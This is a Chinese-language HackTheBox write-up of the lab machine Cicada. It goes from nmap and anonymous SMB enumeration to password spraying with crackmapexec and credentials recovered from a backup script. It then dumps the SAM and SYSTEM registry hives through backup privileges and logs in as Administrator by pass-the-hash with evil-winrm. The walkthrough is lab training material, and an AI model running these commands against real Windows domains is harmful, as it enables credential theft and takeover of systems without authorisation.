htb Cicada靶场笔记

htb Cicada靶场笔记

目标：Cicada，IP地址：10.10.11.35

1.信息收集

1. nmap扫描目标端口，打印端口详细信息

nmap -sVC 10.10.11.35

nmap -sVC 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 22:30 EDT
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 22:31 (0:00:04 remaining)
Nmap scan report for localhost (10.10.11.35)
Host is up (0.14s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 09:12:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-03-27T09:12:52
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h41m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.50 seconds

开放端口53，88，135，139，389，445，464，693，636，3268，3269

2.使用nmap对开放端口进行漏洞扫描

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269 -o vuln 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE

53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

2.smb枚举

1.先对445端口运行的smb进行匿名访问

smbclient -L 10.10.11.35

空密码登录，查看目录除正常目录之外存在HR目录。

进入HR目录，下载HR文件至本地

get Notice from HR.txt

查看文件，获得密码：

Cicada$M6Corpb@Lp#nZp!8*

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeledas "Change Password".
4. Follow the prompts to create a new password**. Make sure your newpassword is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,Cicada Corp

不知道用户名，我们用crackmapexec枚举机器的用户名

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute

将用户名整理到txt字典中

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

2.爆破匹配用户密码

crackmapexec smb 10.10.11.35 -u user -p Cicada$M6Corpb*@Lp#nZp!8 --continue-on-success

得到一组用户名：密码组合

michael.wrightson:Cicada$M6Corpb@Lp#nZp!8*

尝试用此账户密码登录winrm管理，失败

继续通过此用户名密码组合，枚举其他账户。

crackmapexec smb 10.10.11.35 -u michael.wrightson -p pass --users

又发现一个账户密码，david.orelious：aRt$Lp#7t*VQ!3

登录查看共享权限，发现多出一个dev目录，且为read权限。

将目录下载下来

smbclient '\\10.10.11.35\DEV' -U david.orelious

访问其中的文件

cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

得到一组用户名：密码 emily.oscars：Q!3@Lp#M6b7tVt

3.获取权限并提权

1.尝试用此组用户密码作为凭据登录win,登录成功。

evil-winrm 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

在桌面找到user.txt，读取第一个flag

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt 9b66b089812c9065a0631208e1cbdd6d

2.提权

现在是普通账户权限，如何获取admin最高权限。

首先查看当前账户权限

whoami /priv

该查询结果标明，该用户具有转储和备份功能，可以把sam，system转储出来，破解administrator的hash值，接着利用PTH进行哈希传递攻击，从而获取administrator权限。参考这篇文章HTB-Cicada 靶机笔记 - LingX5 - 博客园

在c盘下创建一个temp目录

reg save hklm\sam c:\temp\san

reg save hklm\system c:\temp\system

将san、system转存到temp目录中，并下载到本地中。

破解san

impacket-secretsdump -sam sam -system system local

得到administrator的ntlmhash值2b87e7c93a3e8a0ea4a581937016f341

进行登录,获取root.txt

evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

关于PTH攻击的学习，可以参考这篇PTH(Pass The Hash)哈希传递攻击手法与防范-腾讯云开发者社区-腾讯云